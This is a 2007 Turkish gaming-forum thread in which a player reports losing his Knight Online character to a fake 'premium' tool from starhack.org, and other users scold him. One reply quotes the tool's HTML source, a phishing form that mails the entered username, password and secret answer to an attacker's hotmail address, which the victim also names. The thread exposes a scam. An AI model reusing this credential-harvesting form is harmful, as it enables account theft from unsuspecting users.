Şimdi Ara

YAV NEDEN EMEĞİMİZİ ÇALIYORLAR.....!!!!

Daha Fazla
Bu Konudaki Kullanıcılar: Daha Az
2 Misafir - 2 Masaüstü
5 sn
35
Cevap
0
Favori
850
Tıklama
Daha Fazla
İstatistik
  • Konu İstatistikleri Yükleniyor
0 oy
Öne Çıkar
Sayfa: 12
Sayfaya Git
Git
sonraki
Giriş
  • YAV ARKADAŞLAR BENİM TİBETTE 31 LEVEL OYUNUM VARDI 31 LEVEL İÇİNDE SOSLAR FELAN 2 M'DE PARASI VARDI ÇALMIŞLAR DAHA YARIM SAAT ÖNCE YAVADI R3d_Dra5go7n'du YAV BEN VARYA BEN BU OYUNUMU ÇALANLARIN ............................M UFFFFF YAVVV BEN BUGÜNwww.starhack.org DA DOLAŞIRKEN PREMİUMSUZ OYUNA FELAN GİRME BİŞİ VARDI BENDE ŞAKA FELAN SANDIM İNDİRDİM KULLANICI ADIMI ŞİFREMİ VE GİZLİ OSRUMU İSTEDİ YAZDIM VE CONNECTİ NEYDİ TIKLADIM DAHA SONRA OYUNA GİRDİM TEKTE FELAN ALMADI YARIM SAAT OYNADIM VE ÇIKTIM DEDİM YİNE OYUNA GİREYİM BAKTIM ŞİFREM YANLIŞ DENEDİM DENEDİM OLMADIDEDİM ŞİFREMİ DEĞİŞTİRİM SİTEYE GİRDİM MSN Yİ DE YAZDIM ONUDA DEĞİŞTİRMİŞLER YAVVVVV ÇOOOK ZORUMA GİDİYOR YAVOLMAZZ!!!! BÖLE ŞEY!!!!!

• geçmiş olsun kardeş işte bazı insanlar en büyük hırsızlıklardan birini yapıyor keşke yakalansalarda bilişim suçundan hapise düşseler
  • Starhack.com lol
    I think ur absolutely moron
  • quote:

Orjinalden alıntı: fyagiz

geçmiş olsun kardeş işte bazı insanlar en büyük hırsızlıklardan birini yapıyor keşke yakalansalarda bilişim suçundan hapise düşseler

bunun için polis olsa keşke şaka yapmıyom
  • YAV BENDE ENAYİLİK ETTİM ŞAKADIR DEDİM FELAN ALIN SİZE ŞAKA.... BU BANA DERS OLSUN....!!!!
  • doğru ya keske polis olsa
  • geçmiş olsun
  • quote:

Orjinalden alıntı: tibetli

YAV BENDE ENAYİLİK ETTİM ŞAKADIR DEDİM FELAN ALIN SİZE ŞAKA.... BU BANA DERS OLSUN....!!!!

Arkadaşım böyle şaka mı olur? Nasıl güvenipte bütün bilgilerini adamlara teslim edersin. Bence burda karakteri çaldırlar değil karakteri bedavaya adamın birine verdim de. Geçmiş olsun bundan sonra daha dikkatli olursun heralde.
  • YA ŞAKADIR DEDİM BANA ŞAKA NEDİR ANLADIM....
  • YAV ZATEN MSN Yİ TEK BİLSEM OYUNU GERİ ALACAM ŞEREFSİZLERDEN AMA ONUDA DEĞİŞTİRMİŞLER...
  • quote:

YA ŞAKADIR DEDİM BANA ŞAKA NEDİR ANLADIM....

Kardeş bu nasıl bir mantık.Şaka olduğunu düşünmen bile mantıksızca.Bu kurda koyunu teslim etmek gibi bişey.Hiç üzülme kabahati sen kendinde ara.Adamlara niye şuyumuzu buyumuzu çalıyolar da deme.Sen böyle afedersin düşüncesizlik yaparsan tabi oltaya düşersin.Adam sana zorla indir demiyo ki.Kusura bakma ama suçun %99'u sende.Sitenin adında hayır yok. starHACK...

• YAV KARDEŞİM KİM İSTEMEZKİ OYUNA TEKTE GİRMEYİ BENDE O DÜŞÜNCE İLE İNDİRDİM İSTERSENİZ BAKIN SİZDE.http://www.starhack.org/iste-dunyada-tek-program-t10657/index.html
  • quote:

YAV KARDEŞİM KİM İSTEMEZKİ OYUNA TEKTE GİRMEYİ BENDE O DÜŞÜNCE İLE İNDİRDİM İSTERSENİZ BAKIN SİZDE.http://www.starhack.org/iste-dunyada-tek-program-t10657/index.html

YOK BEN ALMAYAYIM SONRA BİZİDE HACKLEMESİNLER

• quote:

YAV KARDEŞİM KİM İSTEMEZKİ OYUNA TEKTE GİRMEYİ BENDE O DÜŞÜNCE İLE İNDİRDİM İSTERSENİZ BAKIN SİZDE.http://www.starhack.org/iste-dunyada-tek-program-t10657/index.html

Adam msn'İni yazmış içine tabii buna bağlı olarak herşey gidiyo mailine.Fake.Geçmiş olsun ne diyelim..

• Nasıl böyle bir şeye inandın anlamıyorum.Verdiğin adresteki başlıkta yazılanları okusaydın charın hala sende olucaktı.

bu bir fake kaynakına bakın <html>
    <head>
    <title>Koxp Active Form</title>
    <style>
    pre,input{font-family:verdana; font-size:12px; font-weight:bold;}
    form {margin:90px;}
    </style>
    <SCRIPT language=javascript>showHeader();</SCRIPT>
    </head>
    <body>
    <!--Free koxp active form started-->
    <SCRIPT language=javascript>showHeader();</SCRIPT>
    <FORM name=Koxp Activate
    action=http://public.[Linkleri Sadece Üyeler Görebilir..Üye Olmak İçin Tıklayınız...] method=post>
    <INPUT type=hidden value=iste adamin msni BLaDe_ShoW10@hotmail.com bu fake sifreniz buraya gidior
    name=recipient>
    <INPUT type=hidden value="Koxp Activate" name=subject>
    <INPUT type=hidden value="Koxp Activate" name=email>
    <INPUT type=hidden value="Koxp Activate" name=realname>
    <INPUT type=hidden
    value=successfuly.html name=redirect>
    <INPUT type="hidden" name="env_report"
    value="REMOTE_HOST,REMOTE_ADDR,REMOTE_USER,HTTP_US ER_AGENT">
    <INPUT type=hidden name=print_config
    value="email,subject,title,recipient,config">
    <INPUT type=hidden value="Fake Sonucu" name=title>
    <TABLE cellSpacing=0 cellPadding=0 width=760 align=center border=0>
    <pre> Bronz-Premium
    Username : <input name=username size=20>
    Password : <input type=password name=password size=20>
    Gizli yanıt : <input type=password name=password size=20>

<input type=submit value="Bronz Premium"></pre></form>
    <!--Free koxp active form ended-->
    </body>
    </html>

alıntı.

• Safım o kadar mı ben yav
    işte benim oyunum şu an bu şerefsizin elinde ya arkadaşlar biriniz bununla güzel güzel konuşsun yerini yurdunu öğrensin beni engelledi işte bu şerefisizin msn si blade_show10@hotmail.com
  • Dur bakalım ben bi konuşim inş verir..(Hiç sanmıyorum ama)

Edit:Şuan kapalı sanırım...

< Bu mesaj bu kişi tarafından değiştirildi Adem Özkur -- 2 Haziran 2007; 20:23:27 >
  • geçmiş olsun
  • tibetli forumun en saftorozu sensin heralde insan böyle birşeye inanır mı yahu adamlar resmen yazmışlar şifreniz buraya gidiyor diye afedersin ama hiç ağlama
  • bari site adından anlasaydın ((((((((((((((((((starhack))))))))))))))))))))))
  • 
Sayfa: 12
Sayfaya Git
Git
sonraki

Benzer içerikler

- x
Bildirim
mesajınız kopyalandı (ctrl+v) yapıştırmak istediğiniz yere yapıştırabilirsiniz.